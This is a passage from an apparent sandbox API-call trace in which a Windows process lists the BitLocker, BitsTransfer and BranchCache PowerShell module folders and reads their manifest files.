ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0226.089] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3537dbc4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x3537dbc4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x3537dbc4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.BitLocker.Structures.dll", cAlternateFileName="")) returned 1 [0226.089] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3537dbc4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x3537dbc4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x3537dbc4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.BitLocker.Structures.dll", cAlternateFileName="")) returned 0 [0226.089] FindClose (in: hFindFile=0x1a5cf670 | out: hFindFile=0x1a5cf670) returned 1 [0226.089] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe4c0) returned 1 [0226.089] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe480) returned 1 [0226.090] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitLocker\\BitLocker.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\bitlocker\\bitlocker.psd1")) returned 0x20 [0226.090] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe510) returned 1 [0226.090] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitsTransfer", nBufferLength=0x105, lpBuffer=0x1b7fe000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitsTransfer", lpFilePart=0x0) returned 0x3f [0226.090] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitsTransfer\\", nBufferLength=0x105, lpBuffer=0x1b7fdfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitsTransfer\\", lpFilePart=0x0) returned 0x40 [0226.090] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitsTransfer\\*", lpFindFileData=0x1b7fe1b0 | out: lpFindFileData=0x1b7fe1b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa22f14e, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa22f14e, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5cf7f0 [0226.090] FindNextFileW (in: hFindFile=0x1a5cf7f0, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa22f14e, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa22f14e, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0226.091] FindNextFileW (in: hFindFile=0x1a5cf7f0, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f27d034, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f27d034, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f2a3292, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x39be, dwReserved0=0x0, dwReserved1=0x0, cFileName="BitsTransfer.Format.ps1xml", cAlternateFileName="")) returned 1 [0226.091] FindNextFileW (in: hFindFile=0x1a5cf7f0, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f27d034, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f27d034, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f27d034, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x59c, dwReserved0=0x0, dwReserved1=0x0, cFileName="BitsTransfer.psd1", cAlternateFileName="")) returned 1 [0226.091] FindNextFileW (in: hFindFile=0x1a5cf7f0, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f2a3292, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f2a3292, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f2a3292, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1c600, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.BackgroundIntelligentTransfer.Management.Interop.dll", cAlternateFileName="")) returned 1 [0226.091] FindNextFileW (in: hFindFile=0x1a5cf7f0, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f2a3292, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f2a3292, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f2a3292, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1c600, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.BackgroundIntelligentTransfer.Management.Interop.dll", cAlternateFileName="")) returned 0 [0226.091] FindClose (in: hFindFile=0x1a5cf7f0 | out: hFindFile=0x1a5cf7f0) returned 1 [0226.091] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe460) returned 1 [0226.091] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe420) returned 1 [0226.091] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe510) returned 1 [0226.091] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitsTransfer", nBufferLength=0x105, lpBuffer=0x1b7fe000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitsTransfer", lpFilePart=0x0) returned 0x3f [0226.092] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitsTransfer\\", nBufferLength=0x105, lpBuffer=0x1b7fdfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitsTransfer\\", lpFilePart=0x0) returned 0x40 [0226.092] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitsTransfer\\*", lpFindFileData=0x1b7fe1b0 | out: lpFindFileData=0x1b7fe1b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa22f14e, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa22f14e, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5cf670 [0226.092] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa22f14e, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa22f14e, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0226.092] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f27d034, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f27d034, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f2a3292, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x39be, dwReserved0=0x0, dwReserved1=0x0, cFileName="BitsTransfer.Format.ps1xml", cAlternateFileName="")) returned 1 [0226.092] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f27d034, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f27d034, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f27d034, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x59c, dwReserved0=0x0, dwReserved1=0x0, cFileName="BitsTransfer.psd1", cAlternateFileName="")) returned 1 [0226.092] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f2a3292, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f2a3292, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f2a3292, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1c600, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.BackgroundIntelligentTransfer.Management.Interop.dll", cAlternateFileName="")) returned 1 [0226.093] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0226.093] FindClose (in: hFindFile=0x1a5cf670 | out: hFindFile=0x1a5cf670) returned 1 [0226.093] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe460) returned 1 [0226.093] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe420) returned 1 [0226.093] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitsTransfer", nBufferLength=0x105, lpBuffer=0x1b7fe100, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitsTransfer", lpFilePart=0x0) returned 0x3f [0226.093] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe540) returned 1 [0226.093] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitsTransfer" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\bitstransfer"), fInfoLevelId=0x0, lpFileInformation=0x1b7fe620 | out: lpFileInformation=0x1b7fe620*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa22f14e, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa22f14e, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0226.093] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe500) returned 1 [0226.093] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe570) returned 1 [0226.093] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitsTransfer", nBufferLength=0x105, lpBuffer=0x1b7fe060, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitsTransfer", lpFilePart=0x0) returned 0x3f [0226.093] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitsTransfer\\", nBufferLength=0x105, lpBuffer=0x1b7fe000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitsTransfer\\", lpFilePart=0x0) returned 0x40 [0226.093] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitsTransfer\\*", lpFindFileData=0x1b7fe210 | out: lpFindFileData=0x1b7fe210*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa22f14e, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa22f14e, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5cf670 [0226.094] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa22f14e, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa22f14e, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0226.094] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f27d034, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f27d034, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f2a3292, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x39be, dwReserved0=0x0, dwReserved1=0x0, cFileName="BitsTransfer.Format.ps1xml", cAlternateFileName="")) returned 1 [0226.094] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f27d034, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f27d034, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f27d034, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x59c, dwReserved0=0x0, dwReserved1=0x0, cFileName="BitsTransfer.psd1", cAlternateFileName="")) returned 1 [0226.094] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f2a3292, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f2a3292, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f2a3292, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1c600, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.BackgroundIntelligentTransfer.Management.Interop.dll", cAlternateFileName="")) returned 1 [0226.095] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f2a3292, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f2a3292, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f2a3292, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1c600, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.BackgroundIntelligentTransfer.Management.Interop.dll", cAlternateFileName="")) returned 0 [0226.095] FindClose (in: hFindFile=0x1a5cf670 | out: hFindFile=0x1a5cf670) returned 1 [0226.095] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe4c0) returned 1 [0226.095] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe480) returned 1 [0226.095] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitsTransfer\\BitsTransfer.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\bitstransfer\\bitstransfer.psd1")) returned 0x20 [0226.095] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe510) returned 1 [0226.095] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BranchCache", nBufferLength=0x105, lpBuffer=0x1b7fe000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BranchCache", lpFilePart=0x0) returned 0x3e [0226.095] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BranchCache\\", nBufferLength=0x105, lpBuffer=0x1b7fdfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BranchCache\\", lpFilePart=0x0) returned 0x3f [0226.095] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BranchCache\\*", lpFindFileData=0x1b7fe1b0 | out: lpFindFileData=0x1b7fe1b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8e6231, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8e6231, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5cf670 [0226.096] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8e6231, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8e6231, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0226.096] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3771ad5b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f9edf50, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x5f9edf50, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x6c4a, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCache.format.ps1xml", cAlternateFileName="")) returned 1 [0226.096] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3771ad5b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x3771ad5b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x3771ad5b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x699, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCache.psd1", cAlternateFileName="")) returned 1 [0226.096] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3771ad5b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f9555ec, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x5f9555ec, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x141e, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCache.types.ps1xml", cAlternateFileName="")) returned 1 [0226.096] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x37740fa9, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x37740fa9, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x37740fa9, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1a9, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCacheClientSettingData.cdxml", cAlternateFileName="")) returned 1 [0226.097] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3771ad5b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x3771ad5b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x3771ad5b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1b7, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCacheContentServerSettingData.cdxml", cAlternateFileName="")) returned 1 [0226.097] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3771ad5b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x3771ad5b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x3771ad5b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1bf, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCacheHostedCacheServerSettingData.cdxml", cAlternateFileName="")) returned 1 [0226.097] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x37740fa9, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x37740fa9, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x37740fa9, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1ab, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCacheNetworkSettingData.cdxml", cAlternateFileName="")) returned 1 [0226.097] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3771ad5b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f9555ec, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x5f9555ec, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x8a64, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCacheOrchestrator.cdxml", cAlternateFileName="")) returned 1 [0226.098] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3771ad5b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x3771ad5b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x3771ad5b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x197, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCachePrimaryPublicationCacheFile.cdxml", cAlternateFileName="")) returned 1 [0226.098] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3771ad5b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x3771ad5b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x3771ad5b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x197, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCachePrimaryRepublicationCacheFile.cdxml", cAlternateFileName="")) returned 1 [0226.098] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3771ad5b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x3771ad5b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x3771ad5b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1a9, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCacheSecondaryRepublicationCacheFile.cdxml", cAlternateFileName="")) returned 1 [0226.098] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3771ad5b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x3771ad5b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x3771ad5b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x191, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCacheStatus.cdxml", cAlternateFileName="")) returned 1 [0226.098] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3771ad5b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x3771ad5b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x3771ad5b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x191, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCacheStatus.cdxml", cAlternateFileName="")) returned 0 [0226.098] FindClose (in: hFindFile=0x1a5cf670 | out: hFindFile=0x1a5cf670) returned 1 [0226.099] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe460) returned 1 [0226.099] 